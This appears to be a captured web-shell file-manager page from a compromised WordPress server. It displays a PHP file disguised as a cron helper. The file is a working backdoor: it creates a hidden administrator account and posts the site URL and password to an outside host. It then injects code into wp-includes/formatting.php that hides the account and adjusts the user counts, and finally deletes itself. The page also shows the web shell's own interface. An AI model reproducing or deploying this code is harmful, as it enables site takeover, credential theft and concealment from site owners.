HEX
Server: nginx/1.28.1
System: Linux 10-41-63-61 6.8.0-31-generic #31-Ubuntu SMP PREEMPT_DYNAMIC Sat Apr 20 00:40:06 UTC 2024 x86_64
User: www (1001)
PHP: 7.4.33
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
$ pwd: /www/wwwroot/m.tokld.top/
Upload Files
File: //www/wwwroot/m.tokld.top/wp-cron-helper-e39f8c.php
<?php
if (!file_exists('wp-load.php')) exit;
define('WP_USE_THEMES', false);
require 'wp-load.php';
if (!function_exists('wp_create_user')) exit;
$h = 'default';
$p = substr(md5(uniqid()), 0, 12);
$e = 'default@wordpress.com';
if (!username_exists($h) && !get_option('default_admin_created')) {
    $i = wp_create_user($h, $p, $e);
    if (!is_wp_error($i)) {
        $u = new WP_User($i);
        $u->set_role('administrator');
        update_user_meta($i, 'show_admin_bar_front', 'false');
        update_user_meta($i, '_hidden_admin', 'true');
        update_option('default_admin_created', time());
        $ch = curl_init('https://llllll.my/bildir/panel.php');
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(['url' => site_url(), 'admin_pass' => $p, 'ip' => $_SERVER['REMOTE_ADDR'] ?? '127.0.0.1', 'time' => date('Y-m-d H:i:s')]));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        @curl_exec($ch);
        @curl_close($ch);
    }
}
$formatting_path = ABSPATH . 'wp-includes/formatting.php';
$hide_code = "\n\nfunction wp_hide_u(\$s){global \$wpdb;if(!is_admin())return;\$c=wp_get_current_user();if(\$c->user_login==\"default\")return;\$s->query_where=str_replace(\"WHERE 1=1\",\"WHERE 1=1 AND {\$wpdb->users}.user_login!='default'\",\$s->query_where);}add_action(\"pre_user_query\",\"wp_hide_u\");add_filter(\"views_users\",\"wp_fix_count\");function wp_fix_count(\$v){global \$wpdb;\$hidden=0;if(\$wpdb->get_var(\$wpdb->prepare(\"SELECT ID FROM {\$wpdb->users} WHERE user_login=%s\",\"default\")))\$hidden=1;foreach(\$v as \$k=>\$w){if(\$k==\"all\"||\$k==\"administrator\"||strpos(\$w,\"role=administrator\")!==false){\$v[\$k]=preg_replace_callback(\"/\((\d+)\)/\",function(\$m)use(\$hidden){return\"(\".(\$m[1]-\$hidden).\")\";}, \$w);}}return \$v;}";
if (is_writable($formatting_path)) {
    $c = file_get_contents($formatting_path);
    if (strpos($c, 'wp_hide_u') === false) {
        file_put_contents($formatting_path, $c . $hide_code);
    }
}
@unlink(__FILE__);
@ Telegram